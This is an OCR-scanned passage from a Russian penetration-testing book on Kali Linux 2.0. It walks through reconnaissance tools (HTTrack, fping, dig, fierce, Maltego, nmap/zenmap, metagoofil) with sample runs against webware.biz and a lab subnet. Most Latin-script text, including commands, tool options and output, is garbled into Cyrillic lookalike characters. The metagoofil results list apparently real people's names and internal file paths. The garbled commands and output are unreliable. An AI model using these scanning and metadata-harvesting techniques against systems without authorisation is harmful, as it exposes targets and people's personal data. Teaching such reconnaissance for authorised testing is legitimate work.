Міггог Ѵ\/еЬ 5іТе(з) ш.ТГі МігагсІ 

ЭизТ Сет РіТез ІпсІісаТесі 

Міггог АЫ. Ііпкз іп І_ІВІ_з (МиІТірІе Міггог) 

Тезі Ипкз Іп ІІКІ_з (Вооктагк Тезі) 

Оиіі 


Ргоху (геіигп=попе) : 

Уои сап сіеііпе мЛсІсагсІз, ііке: -*.діТ +млЛл/.*.сот/*. 2 ір -*ітд_*. 2 ір 
Міісісагсіз (гѳіигп=попе) :* 

Уои сап сіеііпе асісііііопаі орііопз, зисіі аз гесигзе іеѵеі (- г<питЬег>), зерагесі Ь 
у Ыапк зрасѳз 

То зее ТЬе орііоп іізі. Туре Ьеір 
АсІсІіТіопаІ орііопз (геіигп=попе) : 

—> Ѵ\/І2агс1 соттапсі Ііпе: Тііігаск меЬма ге.Ьіг -М -0 "/гооТЛ/еЬзіТез/гМеЫл/агеСІоп 
е" -%ѵ * 

Кеасіу То ІаипсГі ТГіе тіггог? (У/п) :| 
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НТТгаск начинает свою работу (скриншот логов с сайта): 

/ 

Ссылающаяся страница: Прямой хит 
Имя хоста: 1.46.203.242 

05:21:02 ->/ 

05:21:07 -> /хт1грс.рНр 
05:21:11 -> /?Гее гі=Г552 
05:21:21 -> /хтІгрс.рМр?г5СІ 
05:21:24 -> /?р=1003 
05:21:29 -> /?р=71 
05:21:30 -> /?р=642 
05:21:31 -> / ? раде іс) = 525 
05:21:36 -> /?раде іс) = 1134 
05:21:36 -> /?раде..ісі=27 
05:21:36 -> /?раде іЗ=48 
05:21:41 -> /?р=2504 
05:21:42 -> /?аи0іог=1 
05:21:46 -> /?р=1232 
05:21:50 -> /?р=2499 
05:21:51 -> /?до!о=261830 
05:21:51 -> /?р=2494 
05:21:53 -> /?р=2491 
05:21:54 -> /?р=558 
05:21:56 -> /?р=2484 
05:21:58 -> /?до!о=260278 
05:21:59 -> /?до1:о=4 
05:22:01 -> /?р=2474 
05:22:06 -> /?до!о=259951 
05:22:06 -> /?до1о=259952 
05:22:07 -> /?до!о=259954 
05:22:08 -> /?р=2429 
05:22:09 -> /?р=2422 
05:22:10 -> /?р=2161 
05:22:17 -> /?р=2418 

После окончания клонирования, вы можете подробно изучить структуру каталог, 
размещения страниц и пр. 


1.46.203.242 

2015-01-02 05:22:24 


Пауки: НТТгаск 
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2. {ріп§ и ІМтар — множественный пинг 

Про команду ріп§, уверен, знают все. Её недостаток в том, что она позволяет 
использовать ІСМР для проверки только одного хоста за раз. Команда 1ріп§ позволит 
вам сделать пинг множества хостов одной командой. Она также даст вам прочитать 
файл с множеством хостов или ІР адресов и отправит их для использования в эхо 
запросах пакета ІСМР. 

гооТ@каІі-тіаІ: ~ 

Файл Правка Вид Поиск Терминал Справка 


ІІзаде: Тріпд [орТіопз] [ТагдеТз...] 

-а зРо\л/ ТагдеТз ТРаТ аге аііѵе 

-А зРом ТагдеТз Ьу асісігезз 

-Ь п атоипТ оТ ріпд ЬаТа То зѳпР, іп ЬуТез (РеТаиІТ 68) 

-В Т зеТ ехропепТіа! ЬаскоТТ ТасТог То Т 

-с п соипТ оТ ріпдз То зепР То еасТі ТагдеТ (РеТаиІТ 1) 

-С п зате аз -с, герогТ гезиІТз іп ѵѳгЬозе ТогтаТ 

-е гром еіарзер Тіте оп геТигп раскеТз 

-Т Тііе гѳар ІізТ оТ ТагдеТз Тгош а Тііе ( - теапз зТРіп) (опіу ІТ по -д з 

ресіТіеР) 

-д депегаТе ТагдеТ ІізТ (опіу ІТ по -Т зресіііеР) 

(зресіТу ТТіе зТагТ апР епР ІР іп ТТіе ТагдеТ ІізТ, ог зирріу а ІР 

пеТтазк) 

(ех. Тріпд -д 192.168.1.0 192.168.1.255 ог Тріпд -д 192.168.1.0/ 
24) 

-Н п 5еТ ТТіе ІР ТТ1_ ѵаіие (Тіше То 1_іѵе Рорз) 

-і п іпТегѵа! ЬеШееп зепРіпд ріпд раскеТз (іп тіііізес) (РеТаиІТ 25) 

-1 Іоор зепРіпд ріпдз Тогеѵег 

-т ріпд тиІТірІе іпТегТасез оп ТагдеТ РозТ 

-п зРо\ѵ ТагдеТз Ьу пате (-Р із едиіѵаІепТ) 

-р п іпТегѵа! ЬеТіл/ееп ріпд раскеТз То опе ТагдеТ (іп тіііізес) 

(іп Іооріпд апР соипТіпд тоРез, РеТаиІТ 1000) 

-д диіеТ (Роп'Т зРоіл/ рег-ТагдеТ/рег-ріпд гезиІТз) 

-О п зате аз -д, ЬиТ зРом зиттагу еѵегу п зесопРз 

-г п питЬег оТ геТгіез (РеТаиІТ 3) 

-з ргіпТ Тіпаі зТаТз 

-I ІТ ЬіпР То а рагТісиІаг іпТегТасе 

-5 аРРг зеТ зоигсе аРРгезз 

-Т п іпРіѵіРиа! ТагдеТ іпітіаі ТітеоиТ (іп тіііізес) (РеТаиІТ 500) 

-Т п ідпогеР (Тог сотраТіЬіІіТу ѵі/іТР Тріпд 2.4) 

-и зРоіл/ ТагдеТз ТРаТ аге ипгеасРаЫе 

-О п зеТ ТРе Туре оТ зегѵісе (Тоз) Тіад оп ТРе ІСМР раскеТз 

-ѵ зРом ѵегзіоп 

ТагдеТз ІізТ оТ ТагдеТз То сРеск (ІТ по -Т зресіТіеР) 

:~# | 


1| 

Тріп§-а5§ пеТѵѵогк/РозТ ЬІТ$ 

21 

Тріп§ -аз§ 10.0.1.0/24 


Ключ -а возвратит результат в виде ІР адресов только живых хостов, ключ -5 отобразит 
по сканированию, ключ -§ установит іріп§ в тихих режим, который означает, что 
программа не позазывает пользователю статус каждого сканирования, только 
результат, когда сканирование завершено. 

Команда ІЧтар делает примерно то же самое. 
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3. Рі§ — техники разведывания 


Используется так: 
сіі§ <адрес_сайта> 
Например: 


1 


сП§ ѵѵеЬѵѵаге.Ьіі 


гооІ@каІі-тіаІ: ~ 


Файл Правка Вид Поиск Терминал Справка 


:-# сіід меЬмаге.Ыг 


; «» ОіС 9.8.4-грг2+г1005.12-Р1 «» меЬмаге. Ьіг 
;; дІоЬа! орііопз: +стсІ 
;; боі апзмег: 

;; -»НЕА0ЕК«- орсосіе: ОСЕКУ, зіаіиз: ИОЕККОК, ісі: 46734 

;; Падз: дг гсі га; СНЕКУ: 1, АИЗУ/ЕК: 1, АІІТНОКІТУ : 0, АОРПІОМАІ.: 0 


;; 01Е5ТІОМ 8ЕСТІ0М : 
;\л/еЬ\л/аге .Ыг. 


ІИ 


; АИЗМЕК 5ЕСТІ0Ы : 
эЬма ге .Ьіг. 


2143 


ІИ 


185.26.122.50 


Оиегу Ііте: 639 тзѳс 
ЗЕКѴЕК: 8.8.8.8#53(8.8.8.8) 
МНЕМ: Егі .Іап 2 04:44:14 2015 
М5С ЗІ2Е гсѵсі: 45 


I 




Для поиска авторитетных 0Ы5 серверов делаем так (во всех командах ѴѴеЬѴѴаге.Ыг — 
взят только для примера, заменяйте его на интересующий вас сайт): 
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4. Ріегсе — ищем связанные с сайтом хосты 


Этими хостами, например, для сайта ѴѴеЬѴѴаге.Ыг могут быть т аі I. ѵѵе Ь\л/аге.Ь і г, 
сІоисІ.\л/еЬ\л/аге.ЬІ 2 , {Ь.ѵѵеЬѵѵаге.Ьіг и т.д. 


Применяется команда так (адрес сайта поменяйте на свой): 


1 


Ріегсе -СІП5 ѵѵеЬѵѵаге.Ьіі 


Если гопе Ітапзі'ег недоступна, то используется метод перебора. 


гооІ@каІі-тіаІ: " 


вша 

Файл Правка Вид Поиск Терминал Справка 



:~# Тіегсе -сіпз ѵѵеЬѵѵа ге. Ыг 

0І\І5 Зегѵегз Тог ѵіеЬѵіа ге.Ьіг: 
пзЗ.ЬозТТапсІ. ги 
пз .ТюзТТапсІ. ги 



Тгуіпд гопе ТгапзТег ТігзТ... 

ТезТіпд пзЗ.ГюзТІапсІ. ги 

КедиезТ ТітесІ оиТ ог ТгапзТег 
ТезТіпд пз .ТюзТІапсі . ги 

КедиезТ ТітесІ оиТ ог ТгапзТег 

поТ аНоіл/есІ. 

поТ аИо\л/есІ. 


ІІпзиссеззТиТ іп гопе ТгапзТег (ІТ ѵѵаз ѵѵогТТі а зЬоТ) 

Окау, Тгуіпд ТГіе доосі оісі ТазТііопесі ѵѵау... ЬгиТе Тогсе 


СЬескіпд Тог ѵѵіісісагсі 0М5... 

** РоипсІ 96901616978 .ѵ/еЬмаге.Ьіг аТ 185.26.122.50. 

** НідН ргоЬаЫІіТу оТ ѵѵіісісагсі 0С\І5. 

ІМоѵѵ регТогтіпд 2280 ТезТ(з)... 

■ 



5. МаІІе^о - графическое отображение собранной информации 

Программа находится в меню: Іггіогтаііоп СаіИегіп§| АпаІузіз| МаІІе§о 

МаІ1:е§о - это инструмент для сбора информации, встроенный в Каіі и 
разрабатываемый Раіегѵа. Это многоцелевой инструмент для сбора информации, 
который может собрать информацию из открытых и публичных источников в 
Интернете. Она может искать данные по сайтам или по адресам электронной почты: 


Зіагі а МасЫпе 


ЗТерз 


Кип МасЬіпе - СЬоо&е тасЬіпе (1 оТ 2) 


РІеазе зеІесТ ТЬе тасЫпе То гип Ггот ТЬе ІізТ Ьеіоѵѵ: 


(Щ) Сотрапу ЗТаІкег 

[Оотаіп] 

ТЬіз тасЬіпе ѵѵіІІ Тгу То деГ аІІ етаіі асісігеззез аТ а сіотаіп ТЬеп 

зее ѵѵЬісЬ г... 

О РооТргІпТ І_1 

[Оотаіп] 

ТЬіз регГогтз а ІеѵеІ 1 (ГазТ. Ьазіс.і ГооТрппТ оТ а сіотаіп 


О РооТргІпТ І_2 

[ Оотаіп] 

ТЬіз регТогтз а ІеѵеІ 2 (тіісі) ГооТргіпТ оТ а сіотаіп. 


О РооТргІпТ І_3 

[Оотаіп] 

ТЬіз регГогтз а ІеѵеІ 3 (іпТепзе) ТооТргіпТ оп а сіотаіп. ІТ Такез 

а ѵѵЬіІе апсі ... 

О Регзоп - Етаіі Асісігезз 

[Регзоп] 

Тгіе5 То оЬТаіп зотеопе'5 етаіі асісігезз апсі 5еез ѵѵЬеге іТ'з из 

геі оп ТЬе Іп., 

О Ргипе 1_еаТ ЕпТіТіез 

П 

МасЬіпе То ргипе ІеаТ епТіТіез. 


О ТѵѵіТТег Ріддег 

[РЬгазе] 

ѴѴогкз оп а рЬгазе аз а ТѵѵіТТег аГіаз. ГЧоТе ТЬаТ ТЬіз тасЬіпе ѵѵіІІ аІтозТ сегТ.. 

О ТѵѵіТТег Сео ЦосаТіоп 

[РЬгазе] 

Тгіеэ То ТіпеІ ТЬе део ІосаТіоп оГ а регзоп оп ТѵѵіТТег изіпд ТЬгее сІіГТегепТ т... 

О ТѵѵіТТег МопіТог 

[] 

ТЬіз тасЬіпе топіТогзТѵѵіТТег Тог ЬазЬТадз. апЦ патесі епТіТіез гпепГіопесІ ... 

О ІЖІ_То ІМеТѵѵогк Апсі Оотаіп ІпГогтаТіоп 

[ежи 

Ргот 1_ІКЦ То МеТѵѵогк Апсі Оотаіп ІпТогтаТіоп. 



[✓] ЗЬоѵѵ оп зТагТир 

[✓1 ЗЬоѵѵ оп етрТу дгарЬ сііск 
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Тестирование на проникновение с помощью Каіі Ыпих 2.0 


Для того, чтобы использовать программу, необходима обязательная регистрация. 


ѴУеІсоте То МаІТедо! 


БТерз 

БТагТир ѵѵігаггі • І одіп (2 оГ Б) 

1. 

Шеісоте 

ЕпТегуоиг (ІеТаіІз Ьеіоѵѵ То Іод іп То ТЬе МаІТедо СоттипіТу Бегѵег 

2. 

3. 

Ьодіп 

Ьодіп гезиІТ 

Ог іТ уои Наѵе поТ сіопе зо уеТ. гедізТег Неге 

4. 

ЗеІесТ ТгапзГогт зеесіз 


5. 

ІІрсіаТе ТгапзТогтз 

І_одіп 

* ЕтаіІ Асісігезз Г 


Раззтогсі [ 





* Зоіѵе сарТсЬа ( 


ЗоРиІІ 


< Васк 

№хТ > 

РіпізЬ 

СапсеІ 

Неір 


Результаты поиска: 



МаІТедо СагЬоп - пот! 

Ні (Ьеге.ІТ Тоок а тЫІе Іо деі ТЬеге (апсі ТЫз геіеазе таз Ігіску Іо зсЬесІиІе) Ьиі те'ге 
ЯпаІІу геайу тіІН МаІІѳдо СагЬоп. Аз ТЫз із а та)'ог геіеаз... 


4 Оѵегѵіет 



Е|5 ОеТаІІ Мет 



” РгорегТуѴіѳт 


» х 

<Ыо РгорегТіез> 
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Тестирование на проникновение с помощью Каіі Ыпих 2.0 


юосрппс і.г 

[іліеЬѵѵаге.Ьіг] 

РНазе 1 - соііесііпд сіотаіпз 


N5 раіН 
МХ раІИ 

гип(0отаіпТоМ5гесогсі_0М5) 
гип(ОотаіпТоМХгесогсМ)№) 
изегРІІІеНКеер геіеѵапі МХез 
изегРіІІегіКеер геіеѵапі N5) 


□I 


Кеер геіеѵапі МХев. 

* РІеззе зеіесі ІІіе МХ гесогсіз уои кізИ Іо кеер. 

Ме ѵѵіІІ зее мЬаГз зЬагеіі оп іЬе зеіесіесі 

опез. 

] 

В 



МХ гесогеіз 

Туре 

] таіІ.ѵі/еЬѵѵаге.Ьіг 



етоѵе ипзеіесіесі епііііез Ігот дгарЬ 


ЫехІ> 
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Тестирование на проникновение с помощью Каіі Ыпих 2.0 




6. N тар — создатель карты сети 

ІМтар используется для сканирования хостов и служб в сети. ІМтар имеет продвинутые 
функции, которые могут выявить различные приложения, запущенные на системах, 
также как службы и особенности отпечатков ОС. Это один из наиболее широко 
используемых сетевых сканеров, он является очень эффективным, но в то же время и 
очень заметным. 

ІМтар рекомендуется к применению в специфичных ситуациях, для предотвращения 
срабатывания механизма защиты. 

Дополнительно Каіі идёт с загруженной 2ептар. 2ептар даёт ІМтар графический 
пользовательский интерфейс для выполнения команд. 

2ептар это не только графическая надстройка, программа предлагает и эксклюзивные 
функции. 

Чтобы запустить 2ептар, идём в меню 
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Тестирование на проникновение с помощью КаМ Ыпих 2.0 


Каіі Ыпих | ІпРогтаРіоп СаРбегіп§ | ІУІеРѵѵогк 5саппег$ | гептар 

Множество разных вариантов сканирования, можно создавать профили и очень много 
других полезностей. 



Полученная информация очень обширна и полезна: 


Сканирование Инструменты Профиль Помощь 


Цель ѵѵеЬѵѵаге.Ьіг 


ѵ Профиль | ІпРепзе $сап 


ѵ Сканирование 


Команда [птар -Т4 -А -ѵ ѵѵеЬѵѵаге.Ьіг 


Хосты I Сервисы | Вывод Ьітар Порты / Хосты Топология Детали хоста Сканирование 


ѵѵеЬѵѵаге.Ьіг 


Фильтр хостов 


птар -Т4 -А -ѵ ѵѵеЬѵѵаге.Ьіг 


|_/РезР/ 

ЦтРРр-РіРІе: ЫеЬМагѳ.Ьіг | \хО0\х92\хО1\х81\хО0\хВ5 ѵѵеЬ-\хО1\х82\хО0\хВ5\хО1\х85\хОѲ\хВО\хО0\хВЕ\хОѲ\хВВ\хО0\хВЕ\хО0\хВЗ\хО0\хВ8\хО0\хВ8 \хОѲ\хВО 
\хОѲ\хВѲ \х0Ѳ\хВЕ\х0Ѳ\хВ4\х0Ѳ\хВ0\х0Ѳ\хВЕ\х0Ѳ\хВС ... 

Магпіпа: 055сап гезиІРз тау Ье ипгеІіаЬТе Ьесаизе ѵѵе соиісі пот 1 = іпсІ ар ІеазР 1 ореп апсі 1 сіозесі рогР 

Ааагеззіѵе 05 аиеззез: 0ЕМ1) изег тосіе пеРѵѵогк даРеѵѵау (95%), 5атзипд СІ.Р-315М ргіпРег (89%), ЭеИ 1815сІп ргіпРег (88%), ѴхМогкз (88%), Хегох 
Ѵі/огкСепРге 4150 ргіпРег (88%), Зііпдтесііа ЗІіпдЬох АѴ ТѴ оѵег ІР даРемау (87%), Вау №Рѵѵогкз Вау5Раск 450 зѵѵіРсб (зоРРѵѵаге ѵегзіоп 3.1.0.22) (87% 
), Вау №Рѵѵогкз Вау5Раск 450 зѵѵіРсб (зоРРѵѵаге ѵегзіоп 4.2.0.16) (87%), 5атзипд СЦР-310М ог СІ.Х-3175КМ, ог Хегох Рбазег 6110 ргіпРег (87%), Тусо 
24 РогР 5ІМР МападесІ 5ѵѵіРсб (87%) 

N 0 ехасР 05 таРсбез 'Рог бозР (РезР сопсііРіопз поп-ісІеаТ.). 

№Рыогк РізРапсе: 2 борз 

ТСР 5едиепсе РгегіісРіоп: 0іРРісиІРу=17 (боосі Тиск !) 

ІР ІР бедиепсе СепегаРіоп: ІпсгетепРаІ 

бегѵісе ІпРо; НозР: зеп/50.бозР1.апс1. ги; 05: ІІпіх 


ТКАСЕРШТЕ (изіпд рогР 8Ѳ/Рср) 

НОР РТТ А00КЕ55 

1 0.40 тз 10.0.2.2 

2 0.47 тз зегѵ50-26.бозРІапсі.ги (185.26.122.50) 

№Е; 5с гірр РозР-зсаппіпд. 

ІпіРіаРіпд М5Е аР 05:28 
СотрІеРесІ И5Е аР 05:28, 0.00з еіарзесі 
Кеагі (іаРа РІІез Ргот: /изг/Ьіп/../збаге/птар 


05 апсі 5егѵісе сіеРесРіоп регРогтесі. Ріеазе герогР апу іпсоггесР гезиІРз аР бРРр://птар.огд/зиЬтіР/ 
Мшар сіопе: 1 ІР асісігезз (1 бозР ир) зсаппесі іп 157.10 зесопсіз 

Ваѵѵ раскеРз зепР: 3073 (139.708КВ) | КсѵсІ: 77 (3.212КВ) 


По материалам сайта ѴѴеЬѴѴаге.Ьіг 


90 











































Тестирование на проникновение с помощью КаМ Ыпих 2.0 


2ептар 


Сканирование Инструменты Профиль Помощь 
Цель 


ѵѵеЬѵѵаге.Ьіг 


Профиль 


Іпіепве 5сап 


Команда птар -Т4 -А -ѵ ѵѵеЬѵѵаге.Ьіг 


Хосты 


Сервисы 


Сервис 



ЫТр 

туврі 


грсЬіпЬ 

гвупс 

втір 

5ВЬ 


Вывод ІМтар 

Порты / Хосты 

Топология Детали хоста 

Сканирование 


Имя хоста 

ѵ Порт Протокол 

Состояние 

Версия 

^ ѵѵеЬѵѵаге.Ьіг (185.26.122.50) 21 Іср 

ореп 

РгоТТРР 1.3.5гс3 
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Тестирование на проникновение с помощью Каіі Ыпих 2.0 


$сап ХооІ* РгоЫс Цеір 


Тагдм 110.0.1.0/24 


РгоЫе |іпіеп»е ъсап 




Соттагкі |птар -Т4 


| Ноя» кгѵісеі | 
05 | Ноя 


V 

ъ 

и 

ѵ 

ѵ 

о 

(м 


10 . 0 . 1.1 

10.0.1.103 

10.0.1.104 

10.0.1.107 

10 . 0 . 1.112 

10.0.1.113 

10 . 0 . 1.122 

10 . 0 . 1 . 12 $ 


А -ѵ 10.0.1.0/24 

ІЧтар Оитрит | Рогт» / Ноя» | Торо Іоду Ноя ОеиіІ» 15сао» | 
10.0.1.140 

ѵ Ноя биты» 


$іаіе 

Ор«п рот 

НІіегесІ рол» 

ир 

4 

0 

Ъ 

С1оге4 рост» 

996 


5с ап пес! рост» 

1000 


1)р (іте: 

79217 


Ь»я Ьоот 

>Ѵе<1Маг 20 02 33 16 2013 



• АМгеіИ» 

ІРѴ4 10.0.1.140 
ІРѵб N01 аѵаіІаЬІе 
МАС 00 ОО С$ 86 80 8Г 

* Орсгатіпд 5уяст 

Иат» Оі»Н НеТѵуогк ѴІР 722к Г)ѴК И тих 2.6) 
Ас сигму 

► Рост» и»«сі 

> о$си»и» 

» ТСР $ециепсе 
» ІР Ю 5ечиспсс 

► ТСР Т$ Ьсциспсс 

► С осп те пі» 


7. МеІа§ооЛІ — сбор метаданных из файлов с сайта 

Не надо недооценивать значение метаданных! Они могут рассказать об именах 
пользователей, о программах, которые они используют, могут содержать 0Р5 
координаты съёмки изображения, об операционных системах пользователей, времени 
работы над документами и очень-очень многом другом. О том, как удалить 
метаданные из файла, читайте в статье на нашем братском ресурсе. 

При запуске Ме1а§ооЛ1 без ключей, она выдаёт подсказки по использованию: 


гооІ@каІі-тіаІ: т 

Файл Правка Вид Поиск Терминал Справка 


:~# теіадооііі 

* /\/\ _ | | ___ _ / _(_) | * 

* / \ / _ \ _/ I/ I/ _ \ / _ \| Ш I I * 

* / /\/\ \ _/ И <_| | (_| I (_) I (_) | _| | | * 

* \/ \/\_|\_/ \_ /|_І І_І_І * 

* | _ / 

* Мѳіадооііі Ѵѳг 2.2 * 

* Сіігізііап Магіогеііа * 

* Есіде-Зѳсигііу .сот * 

* стагіоге11а_аі_ес1дѳ-5есигііу .сот * 

ЕІзаде : теіадооііі орііопз 

-сі: сіотаіп Іо зеагсЬ 

-г: іііеіуре Іо сіомпіоасі (рсІГ.сІос ,х!з,ррі ,осІр,осІ5,сІосх,хІ5х,рріх) 

-1: Іітіі оГ гезиііз Ъо зеагсіі (сіеіаиіі 200) 

-И: могк ѵі/іііі сіоситепіз іп сіігесіогу (изе "уез" Гог ТосаТ апаіузіз) 

-п: Іітіі: оГ іііез іо сіоѵ/піоасі 

-о: ѵ/огкіпд сіігесіогу (іосаііоп іо заѵе сіоѵѵпіоасіесі іііез) 

-Г: оиіриі іііе 

Ехатріез: 

тѳіадооГіі .ру -сі арріе.сот -і сіос.рсіі -1 200 -п 50 -о арріеіііез -і гезиііз.Ьі 
ті 

теіадооііі.ру -И уез -о арріеіііез -і гезиііз.Ьіті (Іосаі сііг апаіузіз) 

: | 
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Тестирование на проникновение с помощью Каіі Ыпих 2.0 


1| 

-6 

Домен для поиска 

2 1 

-1 

Типы файлов для загрузки ( рсІі : ,сІос,хІ5,рр1:,осІр,осІ5,сІосх,хІ5х,рр1:х) 

3| 

-1 

Лимит результатов для поиска (по умолчанию 200) 

4| 

-б 

Работать с документами в директории (используйте "уев" для локального 
анализа) 

5 1 

-п 

Лимит файлов для загрузки 

6| 

-о 

Рабочая директория (место для сохранения скаченных файлов) 

71 

-1 

Файл, в который будут записаны результаты анализа 


Пример запуска программы: 


1 


теСа^ооЛІ -сі ѵѵеЬѵѵаге.Ьіі -I сІос,рсІТ -I 200 -п 50 -о аррІеТіІез -I гезиІІз.Ыт 


Программа может найти уйму полезной информации: имена пользователей, 
абсолютные адреса на сервере, имена компьютеров, используемые приложений. Вот 
примеры отчётов программы. 


Список найденных пользователей: 

МеІа^ооШ гезиііз 

КезиИ» Гоп тісгаюйхот 


53% 



387 

144 

683 

63 

изегпатез 

Зоймаге 

Етаііз 

Райіз/Зегѵегз 


іі8ёг пате» Гоипсі: 

• Іазоп Ьаи 

• АиіЬог 

• і КкР. 

• ареазе 

• китагс 

• ІипГепз Не, 2ЬоисЬеп Ілп, ЫГеп§ \Ѵап§, апй Хіаоои Тап§ 

• Ц]иап \Ѵап|>, Тзіп^Ьиа ІІпіѵегзііу, СЫпа; Ѵоп^ 2Ьао, Міп СЬи, Лап-Ьаі 2Ьои, МісгозоЛ КезеагсЬ Азіа, СЫпа; 2Ьі§ап§ Сао, Тзіп^Ьиа ІІпіѵегзііу, СЫпа 

• На§еп Зоііаи, Вгіап Кіп§зЪигу, Ілгііа Мап§и, Оапіеі Роѵеу, Сеог^е Заоп, СеоГГгеу 2\ѵец>, ШМ, ІІпііесі 5 іа се 5 

• Зіиагі Е. ЗсЬесЬіег, КасЬпа ОЬатуа, Апсіу Огтепі, ап<1 Іап РізсЬег 

• топ 

• Ап<Іу Огтепі, Зіиагі ЗсЬесЬіег, апё КасЬпа ЭЬатуа 

• 8ІССШ 

• КісЬагД Зіет 

• А.І ВгизЬ 

• Ьеугіоп 

• теІіззЬг 

• ІоЬп Е)еТгеѵШе 

• Агѵіші Агази, ІеппіГег >Ѵі<1от (ЗсапГогсі ІІпіѵ.) 

• Зег^еу ѴекЬапіп 

• зЬиосЬеп 

• епсіегк 

• і-гзопе 

• ОапуеІРізЬег 

• Сеііп Кауа Кос 

• ІЛ5Т ЗиІ Гогтаі ирйаіесі іп 2005 Ьу Раігіск ВаигіізсЬ 

• Рага§ 

• Ыатрзоп 

• Ріпеіес 

• Маіѵаг 

• ^еттеіі 

• Загііа Ѵаліі 

л ИгісЬпа Пап» ГКіп^аЬппЯі Т аІгсЬті Ѵі>пѴэ»гатап 
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Список найденных серверов: 


8епег§апс1раіЫоиш1: 

• СЕР_Тетр1аіе.<Іо! 

• Коппа1.(1оГ 

• СЕР_Тетріаіе 

• ІЧогтаІ 

• Могтаі.сіоіт 

• ’С:\Му ОоситепІз\І)АТА\ргоГе55Іопа1 зирроп Гог ГГ ргоз тѵГ.сіос' 

• 'С:ШЮОѴ8\ТЕМР\АиіоКесоѵегу заѵе оГ ргоГеззіопаІ зирроп Гог ГГ ргоз ютГ.азсГ 

• \\Р85МАХ\РЦВЬІС\А5СЕМ\ВаазЬееі5\ргоГе55Іопа1 зирроп Гог ГГ ргоз тѵГ.сіос' 

• 'СЛТЕММиІоКесоѵегу заѵе оГ ргоГеззіопаІ зирроп Гог ГГ ргоз тѵГ.азгі 1 

• Л\ог<1аі05\ШРРЕК50М\М50РТ\Р58ѴЧе\ѵ оГГегіп§з\І)аіа5Ьееі5\ргоГе55Іопа1 зирроп Гог ГГ ргоз тѵГ.сіос’ 

• \\Р55тах\риЫіс\А5СЕЭТ\ОаіазЬееі5\Рге55 ТоиЛргоГеззіопаІ зирроп Гог ГГ ргоз тѵГ.сіос' 

• '0:\_5иррогГ\ргоГеззіопа1-5иррогС-ІТргоз.сІос І 

• , С:\'ШОТ\РгоШез\8соП8о\Рег5опа1\зирропаІ\ропа1 Гша1\ргоГе5зюпа1-зирроп-ГГрго8 ГасЫос' 

. О 

• КЕР_Тетр1аіе.сіо! 

• ’С:\Му ОоситеіизШАТА\ргоГе55Іопа1 зирроП Гог оетз тѵГ.сіос' 

• 'С:\ѴІШОѴГ5\ТЕМР\Аи1оЕесоѵегу заѵе оГ ргоГеззіопаІ зирроп Гог оетз тѵГ.азсГ 

• 'РЛАЗСШТіОаГазЬееГзХргоГеззіопаІ зирроп Гог оетз тѵГ.сіос 1 

• Ж$МАХ\РЦШС\А$СЕМ\Е>аіа5Ьееі5\ргоГе55Іопа1 зирроп Гог оетз тѵГ.сіос' 

• ^г<іаЮ5\ІЕРРЕК50М\М50РІ\Р88\Кезѵ оГГегіп§з\Оаазііее[8\ргоГе55Іопа1 зирроп Гог оетз тѵГ.ёос 1 

• 'СЛТЕММиІоКесоѵегу заѵе оГ ргоГеззіопаІ зирроп Гог оетз тѵГ.аз<Г 

• \\Р55тах\риЬЬс\А8СЕ№Г\Оа[а5Ьее1з\Рге85 ТоиЛргоГеззіопаІ зирроп Гог оетз тѵГіос’ 

• 'С:\'Шет\РгоШе5\5соП§о\Рег50па]\5ирроПа1\ропа1 ГтаЕргоГеззіопаі-зирроП-Гог-оетз ГасгДос' 

• зріеііг97.<1оІ 

• \\Р55МАХ\РЦВЬІС\А5СЕХТ\Ргетіег - ЕхреПІ5еМЭа!язГіееС5\ргетіег зирроП Гог іЬе епіегргізе - гасіатз 4_20.<іос' 

• 'Р:\А8СЕРГГ\ОаСазЬееіз\ргетіег зирроп Гог [Ье епіегргізе - гасіатз 4_20.<іос' 

• Л\огсіаі05\ІЕРРЕК80РАМЗОРТ\Р58^е\ѵ оГГегіп§5\ОаІазГіееІ5\ргетіег зирроп Гог іЬе епіегргізе - гасіатз 4_20.сіос' 

• \\Р55тах\риЫіс\АЗСШТ\ОаИ5Ьееі5\Рге58 ТоиЛргетіег зирроп Гог ІЬе епіегргізе - гасіатз 4_20.<іос' 

• '\\Р5зтах\риЫіс\А$СЕ.\ г ТОа[а5Ьее1з\ргетіег зирроп Гог іЬе епіегргізе .сіос' 

• ’ІЛАзсепЮаІазЬееіз^гетіег зирроп Гог (Ье епіегргізе іос 1 

• \\рззтах\риЫіс\А8СЕОТ\МагкеІіп8\Ваа5Ьееі5\ргетіег5ирропГопЬеепіегргІ5е.<іос' 

• ’СЛсѵіпсіосѵзѴГЕМРВЕЬ-ЬЦХ • Еп^іізЬ - Ьісепзе 2.0 - ѵЗ - тагкесі.ёос 

• ’С:\\ѵіп(Іоѵѵ5\ТЕМР\ВЕТ-ШХ - Еп^іізЬ - Ьісепзе 2.0 - ѵЗ - сіеап.сіос' 

• Л\РАЦЦАі\А\Ь’5ЕК5\МКА\МісгозоГі\М5 Еиг Ьосаіігаііоп СиісіеІіпезѴСатриз П\Веі(>іит\ВЕЬ-ЬЬ’Х - Еп^ІізЬ - Ьісепзе 2.0 - ѵЗ - тагкесЫос' 

• І \\РАЦЬІАХА\Ь’5ЕК5\МКА\МісгозоГі\М5 Еиг Ьосаіігаііоп СиісіеІіпезѴСатриз ШВеі^іитУВЕЬ-ШХ - Еп^іізЬ - Ьісепзе 2.0 - ѵЗ - сіеап.сіос' 

• 'СЛсѵіпсіоѵѵзѴГЕММиіоНегзіеІ-ѵегзіе ѵап ВЕЬ-ЫІХ - Еп§1ізЬ - Ьісепзе 2.азсі' 

• '\\то1іеге\ЬЕСАЬ\8и5ап5ѵ\ЕОЧСАТЮ№СА & ЗА 2,0\Ьос аіілаііо п\Ве 1$> іи т\2. ѴѴІіЬ ту сЬап§ез\ВЕЬ&Ы'Х_Е\С - ЗсЬооі Сатриз Ьісепзе А^геетеш.сіос 1 

• \\тоііеге\ЬЕСАЬ\5и8ап5ѵ\ЕОІіСАТІО№СА & ЗА 2.0\РВДАЬ\ВеІ8Іит\ВЕЬ&ЬЦХ_Е№3 - ЗсЬооі Сатриз Ьісепзе А^геетепі - Іиіу 99.сіос' 
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Найденные версии программного обеспечения: 


8ойѵѵаге ѵегяога іоипсі: 

• 1>уМісг050Й® \Ѵогй 2010 
. МіКТеХ рсИТеХ-1.40.11 

• ТеХ 

• рёГеТеХ- 1.20а 

• ЬаТеХ іѵііЬ ЬурегтеГ раскате 

• АсгоЬаі Оізііііег 7.0 (\Ѵіікіоѵѵ$) 

• АсгоЬаі Оізііііег Сотшаші 3.01 Гог Зоіагіз 2.3 ап<1 Іаіег (5РАКС) 

• ШЕЕ Соругі@М 

• рйГГеХ-І.ЮЬ 

